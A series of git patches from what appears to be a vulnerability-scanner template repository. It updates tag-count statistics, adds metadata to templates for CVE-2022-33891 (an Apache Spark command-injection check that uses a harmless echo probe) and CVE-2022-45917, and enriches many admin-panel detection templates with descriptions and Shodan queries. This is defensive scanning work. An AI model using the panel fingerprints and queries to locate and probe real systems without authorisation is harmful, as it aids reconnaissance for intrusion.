mastodon | 1 | | | | | | | | | +| muhttpd | 1 | | | | | | | | | +| polarisft | 1 | | | | | | | | | +| hiring | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| webasyst | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| dahua | 1 | | | | | | | | | +| wpb-show-core | 1 | | | | | | | | | +| haraj | 1 | | | | | | | | | +| quixplorer | 1 | | | | | | | | | +| defi | 1 | | | | | | | | | +| ticketmaster | 1 | | | | | | | | | +| admidio | 1 | | | | | | | | | +| qlik | 1 | | | | | | | | | +| thinkserver | 1 | | | | | | | | | +| yopass | 1 | | | | | | | | | +| cx | 1 | | | | | | | | | +| parse | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| tuxedo | 1 | | | | | | | | | +| ecosys | 1 | | | | | | | | | +| tink | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| wix | 1 | | | | | | | | | +| xenforo | 1 | | | | | | | | | +| gpc | 1 | | | | | | | | | +| lacie | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| musicstore | 1 | | | | | | | | | +| grandnode | 1 | | | | | | | | | +| asgaros-forum | 1 | | | | | | | | | +| csa | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| webpconverter | 1 | | | | | | | | | +| bscw | 1 | | | | | | | | | +| caddy | 1 | | | | | | | | | +| datahub | 1 | | | | | | | | | +| jsmol2wp | 1 | | | | | | | | | +| huemagic | 1 | | | | | | | | | +| weboftrust | 1 | | | | | | | | | +| debounce | 1 | | | | | | | | | +| workresources | 1 | | | | | | | | | +| inetutils | 1 | | | | | | | | | +| bitcoinaverage | 1 | | | | | | | | | +| intouch | 1 | | | | | | | | | +| ipvpn | 1 | | | | | | | | | +| bootstrap | 1 | | | | | | | | | +| jinher | 1 | | | | | | | | | +| wp-video-gallery-free | 1 | | | | | | | | | +| quip | 1 | | | | | | | | | +| exchangerateapi | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| scanii | 1 | | | | | | | | | +| jobsearch | 1 | | | | | | | | | +| customize-login-image | 1 | | | | | | | | | +| fhem | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| crystal | 1 | | | | | | | | | +| ignition | 1 | | | | | | | | | +| logitech | 1 | | | | | | | | | +| xmpp | 1 | | | | | | | | | +| caseaware | 1 | | | | | | | | | +| kerio | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| codeception | 1 | | | | | | | | | +| intelliflash | 1 | | | | | | | | | +| icinga | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| badgeos | 1 | | | | | | | | | +| chaos | 1 | | | | | | | | | +| nimsoft | 1 | | | | | | | | | +| cofense | 1 | | | | | | | | | +| cve2002 | 1 | | | | | | | | | +| natemail | 1 | | | | | | | | | +| exolis | 1 | | | | | | | | | +| concourse | 1 | | | | | | | | | +| tinymce | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | +| bitdefender | 1 | | | | | | | | | +| web-dispatcher | 1 | | | | | | | | | +| macaddresslookup | 1 | | | | | | | | | +| hfs | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| charity | 1 | | | | | | | | | +| fox | 1 | | | | | | | | | +| backpack | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| utility | 1 | | | | | | | | | +| tls | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| c99 | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| lychee | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| ejs | 1 | | | | | | | | | +| domos | 1 | | | | | | | | | +| all-in-one-wp-migration | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| cve2001 | 1 | | | | | | | | | +| ipfind | 1 | | | | | | | | | +| webex | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| coinranking | 1 | | | | | | | | | +| passwordmanager | 1 | | | | | | | | | +| blogengine | 1 | | | | | | | | | +| likebtn-like-button | 1 | | | | | | | | | +| chronoforums | 1 | | | | | | | | | +| containers | 1 | | | | | | | | | +| prexview | 1 | | | | | | | | | +| drive | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| give | 1 | | | | | | | | | +| patreon-connect | 1 | | | | | | | | | +| cdi | 1 | | | | | | | | | +| narnoo-distributor | 1 | | | | | | | | | +| franklinfueling | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| jsapi | 1 | | | | | | | | | +| auxin-elements | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| smf | 1 | | | | | | | | | +| gemfury | 1 | | | | | | | | | +| coverity | 1 | | | | | | | | | +| myanimelist | 1 | | | | | | | | | +| unauthenticated | 1 | | | | | | | | | +| webeditors | 1 | | | | | | | | | +| gurock | 1 | | | | | | | | | +| synapse | 1 | | | | | | | | | +| mesos | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| contentify | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| atlantis | 1 | | | | | | | | | +| zoomsounds | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| hangfire | 1 | | | | | | | | | +| zeppelin | 1 | | | | | | | | | +| microfinance | 1 | | | | | | | | | +| covalent | 1 | | | | | | | | | +| timezone | 1 | | | | | | | | | +| qts | 1 | | | | | | | | | +| facturascripts | 1 | | | | | | | | | +| place | 1 | | | | | | | | | +| wdja | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| aero | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| debian | 1 | | | | | | | | | +| readthedocs | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| sms | 1 | | | | | | | | | +| sast | 1 | | | | | | | | | +| loganalyzer | 1 | | | | | | | | | +| nzbget | 1 | | | | | | | | | +| smugmug | 1 | | | | | | | | | +| vagrant | 1 | | | | | | | | | +| msmtp | 1 | | | | | | | | | +| piluscart | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| pagecdn | 1 | | | | | | | | | +| visualstudio | 1 | | | | | | | | | +| semaphore | 1 | | | | | | | | | +| opengraphr | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| phpwind | 1 | | | | | | | | | +| bonita | 1 | | | | | | | | | +| gpon | 1 | | | | | | | | | +| asanhamayesh | 1 | | | | | | | | | +| connect-central | 1 | | | | | | | | | +| siteomat | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| appsmith | 1 | | | | | | | | | +| pingdom | 1 | | | | | | | | | +| exposed | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| commerce | 1 | | | | | | | | | +| event | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| cve2004 | 1 | | | | | | | | | +| clockify | 1 | | | | | | | | | +| rconfig.exposure | 1 | | | | | | | | | +| wago | 1 | | | | | | | | | +| joget | 1 | | | | | | | | | +| monitoring | 1 | | | | | | | | | +| gyra | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| roteador | 1 | | | | | | | | | +| pinata | 1 | | | | | | | | | +| dvdFab | 1 | | | | | | | | | +| sv3c | 1 | | | | | | | | | +| catfishcms | 1 | | | | | | | | | +| airtable | 1 | | | | | | | | | +| clickup | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| zenphoto | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| hugo | 1 | | | | | | | | | +| cmsimple | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| pushgateway | 1 | | | | | | | | | +| webviewer | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| ninja-forms | 1 | | | | | | | | | +| supersign | 1 | | | | | | | | | +| istat | 1 | | | | | | | | | +| netweaver | 1 | | | | | | | | | +| usc-e-shop | 1 | | | | | | | | | +| niagara | 1 | | | | | | | | | +| viaware | 1 | | | | | | | | | +| glowroot | 1 | | | | | | | | | +| nytimes | 1 | | | | | | | | | +| trilium | 1 | | | | | | | | | +| mongo-express | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| jabber | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| duplicator | 1 | | | | | | | | | +| zoneminder | 1 | | | | | | | | | +| pkp-lib | 1 | | | | | | | | | +| abuseipdb | 1 | | | | | | | | | +| nsicg | 1 | | | | | | | | | +| flowci | 1 | | | | | | | | | +| incapptic-connect | 1 | | | | | | | | | +| u5cms | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| couchcms | 1 | | | | | | | | | +| advanced-booking-calendar | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| yzmcms | 1 | | | | | | | | | +| icecast | 1 | | | | | | | | | +| pricing-deals-for-woocommerce | 1 | | | | | | | | | +| phpmemcached | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| gorest | 1 | | | | | | | | | +| html2pdf | 1 | | | | | | | | | +| dradis | 1 | | | | | | | | | +| find | 1 | | | | | | | | | +| pcdn | 1 | | | | | | | | | +| ncomputing | 1 | | | | | | | | | +| tugboat | 1 | | | | | | | | | +| dropbox | 1 | | | | | | | | | +| bagisto | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| ixbusweb | 1 | | | | | | | | | +| tufin | 1 | | | | | | | | | +| interactsh | 1 | | | | | | | | | +| browshot | 1 | | | | | | | | | +| zblog | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| getgrav | 1 | | | | | | | | | +| cnvd2017 | 1 | | | | | | | | | +| 3com | 1 | | | | | | | | | +| drill | 1 | | | | | | | | | +| mailer | 1 | | | | | | | | | +| flyteconsole | 1 | | | | | | | | | +| permissions | 1 | | | | | | | | | +| wireless | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| bibliopac | 1 | | | | | | | | | +| faust | 1 | | | | | | | | | +| manager | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| siebel | 1 | | | | | | | | | +| buildkite | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| revslider | 1 | | | | | | | | | +| bingmaps | 1 | | | | | | | | | +| bamboo | 1 | | | | | | | | | +| jumpserver | 1 | | | | | | | | | +| darktrace | 1 | | | | | | | | | +| mailhog | 1 | | | | | | | | | +| webcenter | 1 | | | | | | | | | +| collectd | 1 | | | | | | | | | +| gerapy | 1 | | | | | | | | | +| sauter | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| gallery | 1 | | | | | | | | | +| mgrng | 1 | | | | | | | | | +| flexbe | 1 | | | | | | | | | +| b2bbuilder | 1 | | | | | | | | | +| activecollab | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| ccm | 1 | | | | | | | | | +| officekeeper | 1 | | | | | | | | | +| fuji | 1 | | | | | | | | | +| flip | 1 | | | | | | | | | +| age-gate | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| filr | 1 | | | | | | | | | +| iq-block-country | 1 | | | | | | | | | +| sitefinity | 1 | | | | | | | | | +| notebook | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| blockfrost | 1 | | | | | | | | | +| vault | 1 | | | | | | | | | +| short.io | 1 | | | | | | | | | +| phpsocialnetwork | 1 | | | | | | | | | +| superwebmailer | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| secnet | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| vertex | 1 | | | | | | | | | +| phpldap | 1 | | | | | | | | | +| openweather | 1 | | | | | | | | | +| block | 1 | | | | | | | | | +| thedogapi | 1 | | | | | | | | | +| idera | 1 | | | | | | | | | +| remkon | 1 | | | | | | | | | +| cvms | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| nirweb-support | 1 | | | | | | | | | +| knowage | 1 | | | | | | | | | +| librenms | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| zipkin | 1 | | | | | | | | | +| joomsport-sports-league-results-management | 1 | | | | | | | | | +| cuppa | 1 | | | | | | | | | +| blueiris | 1 | | | | | | | | | +| edgeos | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| surveysparrow | 1 | | | | | | | | | +| stats | 1 | | | | | | | | | +| workreap | 1 | | | | | | | | | +| issabel | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index d3507f9b19..e8ddd218fe 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1552 | dhiyaneshdk | 701 | cves | 1529 | info | 1671 | http | 4330 | -| panel | 780 | daffainfo | 662 | exposed-panels | 782 | high | 1152 | file | 78 | -| edb | 582 | pikpikcu | 344 | vulnerabilities | 520 | medium | 837 | network | 77 | -| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 | -| xss | 543 | geeknik | 206 | technologies | 322 | low | 281 | | | -| lfi | 519 | pussycat0x | 172 | exposures | 308 | unknown | 25 | | | -| wordpress | 471 | dwisiswant0 | 171 | token-spray | 236 | | | | | -| cve2021 | 370 | 0x_akoko | 170 | workflows | 190 | | | | | -| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | | -| tech | 360 | princechaddha | 153 | file | 78 | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|-----------|-------|--------------|-------|------------------|-------|----------|-------|---------|-------| +| cve | 1575 | dhiyaneshdk | 707 | cves | 1552 | info | 1919 | http | 4630 | +| panel | 803 | daffainfo | 662 | exposed-panels | 805 | high | 1169 | network | 84 | +| wordpress | 684 | pikpikcu | 344 | technologies | 529 | medium | 849 | file | 78 | +| edb | 583 | pdteam | 273 | vulnerabilities | 528 | critical | 568 | dns | 17 | +| wp-plugin | 579 | geeknik | 220 | misconfiguration | 371 | low | 294 | | | +| exposure | 573 | ricardomaia | 210 | exposures | 325 | unknown | 26 | | | +| tech | 567 | pussycat0x | 181 | token-spray | 237 | | | | | +| xss | 548 | 0x_akoko | 171 | workflows | 190 | | | | | +| lfi | 522 | dwisiswant0 | 171 | default-logins | 122 | | | | | +| cve2021 | 375 | ritikchaddha | 167 | file | 78 | | | | | From 4ac23b19d598c0e8bb48d6f1cb1572adcf849a42 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 5 Jan 2023 11:48:35 +0000 Subject: [PATCH 0749/1133] Auto README Update [Thu Jan 5 11:48:35 UTC 2023] :robot: --- README.md | 24 ++++++++++++------------ 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/README.md b/README.md index 85d05b827e..434a46143f 100644 --- a/README.md +++ b/README.md @@ -40,18 +40,18 @@ An overview of the nuclei template project, including statistics on unique tags, ## Nuclei Templates Top 10 statistics -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1552 | dhiyaneshdk | 701 | cves | 1529 | info | 1671 | http | 4330 | -| panel | 780 | daffainfo | 662 | exposed-panels | 782 | high | 1152 | file | 78 | -| edb | 582 | pikpikcu | 344 | vulnerabilities | 520 | medium | 837 | network | 77 | -| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 | -| xss | 543 | geeknik | 206 | technologies | 322 | low | 281 | | | -| lfi | 519 | pussycat0x | 172 | exposures | 308 | unknown | 25 | | | -| wordpress | 471 | dwisiswant0 | 171 | token-spray | 236 | | | | | -| cve2021 | 370 | 0x_akoko | 170 | workflows | 190 | | | | | -| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | | -| tech | 360 | princechaddha | 153 | file | 78 | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|-----------|-------|--------------|-------|------------------|-------|----------|-------|---------|-------| +| cve | 1575 | dhiyaneshdk | 707 | cves | 1552 | info | 1919 | http | 4630 | +| panel | 803 | daffainfo | 662 | exposed-panels | 805 | high | 1169 | network | 84 | +| wordpress | 684 | pikpikcu | 344 | technologies | 529 | medium | 849 | file | 78 | +| edb | 583 | pdteam | 273 | vulnerabilities | 528 | critical | 568 | dns | 17 | +| wp-plugin | 579 | geeknik | 220 | misconfiguration | 371 | low | 294 | | | +| exposure | 573 | ricardomaia | 210 | exposures | 325 | unknown | 26 | | | +| tech | 567 | pussycat0x | 181 | token-spray | 237 | | | | | +| xss | 548 | 0x_akoko | 171 | workflows | 190 | | | | | +| lfi | 522 | dwisiswant0 | 171 | default-logins | 122 | | | | | +| cve2021 | 375 | ritikchaddha | 167 | file | 78 | | | | | **335 directories, 5243 files**. From 135be31e2ee16265f36d8aab054288d2ef84af7c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 5 Jan 2023 11:52:57 +0000 Subject: [PATCH 0750/1133] Auto Generated CVE annotations [Thu Jan 5 11:52:57 UTC 2023] :robot: --- cves/2022/CVE-2022-33891.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-33891.yaml b/cves/2022/CVE-2022-33891.yaml index 709c340a2a..1ecb9899b9 100644 --- a/cves/2022/CVE-2022-33891.yaml +++ b/cves/2022/CVE-2022-33891.yaml @@ -18,7 +18,7 @@ info: metadata: shodan-query: title:"Spark Master at" verified: "true" - tags: cve,cve2022,apache,spark,authenticated + tags: packetstorm,cve,cve2022,apache,spark,authenticated variables: command: "echo CVE-2022-33891 | rev" From a89d7e99ba96e0700a6148a5decf73ad7899b4b3 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 5 Jan 2023 09:57:06 -0500 Subject: [PATCH 0751/1133] Dashboard Content Enhancements (#6469) Dashboard Content Enhancements --- cves/2022/CVE-2022-33891.yaml | 1 + cves/2022/CVE-2022-45917.yaml | 1 + exposed-panels/aircube-dashboard-panel.yaml | 9 ++- exposed-panels/content-central-login.yaml | 9 ++- exposed-panels/creatio-login-panel.yaml | 9 ++- exposed-panels/dqs-superadmin-panel.yaml | 9 ++- .../flahscookie-superadmin-panel.yaml | 9 ++- exposed-panels/gyra-master-admin.yaml | 9 ++- exposed-panels/ilias-panel.yaml | 9 ++- exposed-panels/jcms-panel.yaml | 9 ++- exposed-panels/loxone-panel.yaml | 9 ++- exposed-panels/mag-dashboard-panel.yaml | 9 ++- exposed-panels/microfocus-admin-server.yaml | 9 ++- .../mikrotik/mikrotik-routeros.yaml | 5 +- exposed-panels/ncentral-panel.yaml | 9 ++- exposed-panels/netris-dashboard-panel.yaml | 9 ++- exposed-panels/opencart-panel.yaml | 10 +++- exposed-panels/planet-estream-panel.yaml | 9 ++- exposed-panels/posthog-admin-panel.yaml | 9 ++- exposed-panels/retool-login.yaml | 9 ++- exposed-panels/riseup-panel.yaml | 9 ++- exposed-panels/rocketmq-console-exposure.yaml | 9 ++- exposed-panels/room-alert-detect.yaml | 9 ++- .../royalevent-management-panel.yaml | 9 ++- exposed-panels/rsa-self-service.yaml | 9 ++- exposed-panels/rstudio-detect.yaml | 9 ++- .../ruckus-wireless-admin-login.yaml | 57 +++++++++++-------- exposed-panels/ruijie/rg-uac-panel.yaml | 9 ++- exposed-panels/rundeck-login.yaml | 9 ++- .../rustici-content-controller.yaml | 9 ++- exposed-panels/saferoads-vms-login.yaml | 11 +++- exposed-panels/sage-panel.yaml | 9 ++- exposed-panels/samba-swat-panel.yaml | 9 ++- exposed-panels/samsung-printer-detect.yaml | 9 ++- exposed-panels/sap-hana-xsengine-panel.yaml | 9 ++- vulnerabilities/qibocms-file-download.yaml | 2 +- 36 files changed, 287 insertions(+), 61 deletions(-) diff --git a/cves/2022/CVE-2022-33891.yaml b/cves/2022/CVE-2022-33891.yaml index 1ecb9899b9..cffb056e35 100644 --- a/cves/2022/CVE-2022-33891.yaml +++ b/cves/2022/CVE-2022-33891.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-77 metadata: shodan-query: title:"Spark Master at" + cve-id: CVE-2022-33891 verified: "true" tags: packetstorm,cve,cve2022,apache,spark,authenticated diff --git a/cves/2022/CVE-2022-45917.yaml b/cves/2022/CVE-2022-45917.yaml index 07b78e4a41..bc6097e4be 100644 --- a/cves/2022/CVE-2022-45917.yaml +++ b/cves/2022/CVE-2022-45917.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-601 metadata: shodan-query: http.html:"ILIAS" + cve-id: CVE-2022-45917 verified: "true" tags: redirect,packetstorm,seclists,cve,cve2022,ilias diff --git a/exposed-panels/aircube-dashboard-panel.yaml b/exposed-panels/aircube-dashboard-panel.yaml index 500db3ae8b..8c6228dfec 100644 --- a/exposed-panels/aircube-dashboard-panel.yaml +++ b/exposed-panels/aircube-dashboard-panel.yaml @@ -1,9 +1,14 @@ id: aircube-dashboard-panel info: - name: AirCube Dashboard Panel + name: airCube Dashboard Login Panel - Detect author: theamanrawat severity: info + description: airCube Dashboard login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"AirCube Dashboard" @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/content-central-login.yaml b/exposed-panels/content-central-login.yaml index 1ac37a23ac..323f89e19c 100644 --- a/exposed-panels/content-central-login.yaml +++ b/exposed-panels/content-central-login.yaml @@ -1,9 +1,14 @@ id: content-central-login info: - name: Content Central Login Panel + name: Content Central Login Panel - Detect author: theabhinavgaur severity: info + description: Content Central login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"Content Central Login" @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/creatio-login-panel.yaml b/exposed-panels/creatio-login-panel.yaml index a90d09f947..8f95547dca 100644 --- a/exposed-panels/creatio-login-panel.yaml +++ b/exposed-panels/creatio-login-panel.yaml @@ -1,9 +1,14 @@ id: creatio-login-panel info: - name: Creatio Login Panel + name: Creatio Login Panel - Detect author: theamanrawat severity: info + description: Creatio login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"Creatio" @@ -27,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/dqs-superadmin-panel.yaml b/exposed-panels/dqs-superadmin-panel.yaml index 5781c8c896..9b8b86aafc 100644 --- a/exposed-panels/dqs-superadmin-panel.yaml +++ b/exposed-panels/dqs-superadmin-panel.yaml @@ -1,9 +1,14 @@ id: dqs-superadmin-panel info: - name: DQS Superadmin Login Panel + name: DQS Superadmin Login Panel - Detect author: Hardik-Solanki severity: info + description: DQS Superadmin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"DQS Superadmin" @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/flahscookie-superadmin-panel.yaml b/exposed-panels/flahscookie-superadmin-panel.yaml index 9c91045171..215ce86df5 100644 --- a/exposed-panels/flahscookie-superadmin-panel.yaml +++ b/exposed-panels/flahscookie-superadmin-panel.yaml @@ -1,9 +1,14 @@ id: flahscookie-superadmin-panel info: - name: Flahscookie Superadmin Login + name: Flahscookie Superadmin Login Panel - Detect author: Hardik-Solanki severity: info + description: Flahscookie Superadmin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Flahscookie Superadmin" @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/gyra-master-admin.yaml b/exposed-panels/gyra-master-admin.yaml index bb89fa451e..ac44e8286d 100644 --- a/exposed-panels/gyra-master-admin.yaml +++ b/exposed-panels/gyra-master-admin.yaml @@ -1,9 +1,14 @@ id: gyra-master-admin info: - name: GYRA Master Admin + name: GYRA Master Admin Login Panel - Detect author: Hardik-Solanki severity: info + description: GYRA Master Admin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Login | GYRA Master Admin" @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/ilias-panel.yaml b/exposed-panels/ilias-panel.yaml index 62b6b5c62d..f7ca7f7542 100644 --- a/exposed-panels/ilias-panel.yaml +++ b/exposed-panels/ilias-panel.yaml @@ -1,9 +1,14 @@ id: ilias-panel info: - name: ILIAS Panel + name: ILIAS Login Panel - Detect author: arafatansari severity: info + description: ILIAS login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"ILIAS" @@ -28,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/jcms-panel.yaml b/exposed-panels/jcms-panel.yaml index 32dfe38219..8b2ba91139 100644 --- a/exposed-panels/jcms-panel.yaml +++ b/exposed-panels/jcms-panel.yaml @@ -1,11 +1,16 @@ id: jalios-jcms-panel info: - name: Jalios JCMS Panel + name: Jalios JCMS Login Panel - Detect author: righettod severity: info + description: Jalios JCMS login panel was detected. reference: - https://www.jalios.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: html:"Jalios JCMS" @@ -30,3 +35,5 @@ requests: - "JCMS_login" - "/jcms/" condition: or + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/loxone-panel.yaml b/exposed-panels/loxone-panel.yaml index a9d5534c63..4c03217b02 100644 --- a/exposed-panels/loxone-panel.yaml +++ b/exposed-panels/loxone-panel.yaml @@ -1,9 +1,14 @@ id: loxone-panel info: - name: Loxone Intercom Video Login + name: Loxone Intercom Video Panel - Detect author: theabhinavgaur severity: info + description: Loxone Intercom Video panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"Loxone Intercom Video" @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/mag-dashboard-panel.yaml b/exposed-panels/mag-dashboard-panel.yaml index 5c93554ab5..80d11a87d3 100644 --- a/exposed-panels/mag-dashboard-panel.yaml +++ b/exposed-panels/mag-dashboard-panel.yaml @@ -1,9 +1,14 @@ id: mag-dashboard-panel info: - name: MAG Dashboard Panel + name: MAG Dashboard Login Panel - Detect author: theamanrawat severity: info + description: MAG Dashboard login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"MAG Dashboard Login" @@ -28,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/microfocus-admin-server.yaml b/exposed-panels/microfocus-admin-server.yaml index 41533f358d..65daa6d569 100644 --- a/exposed-panels/microfocus-admin-server.yaml +++ b/exposed-panels/microfocus-admin-server.yaml @@ -1,9 +1,14 @@ id: microfocus-admin-server info: - name: Micro Focus Enterprise Server Administration + name: Micro Focus Enterprise Server Admin Panel - Detect author: theabhinavgaur severity: medium + description: Micro Focus Enterprise Server Admin panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: "Micro Focus DSD" @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/03 diff --git a/exposed-panels/mikrotik/mikrotik-routeros.yaml b/exposed-panels/mikrotik/mikrotik-routeros.yaml index f5d6b185aa..0375ccbe7c 100644 --- a/exposed-panels/mikrotik/mikrotik-routeros.yaml +++ b/exposed-panels/mikrotik/mikrotik-routeros.yaml @@ -1,8 +1,7 @@ id: mikrotik-routeros info: - - name: MikroTik Router OS - Login Panel Detect + name: MikroTik Router OS Login Panel - Detect author: gy741 severity: info description: MikroTik Router OS login panel was detected. @@ -59,3 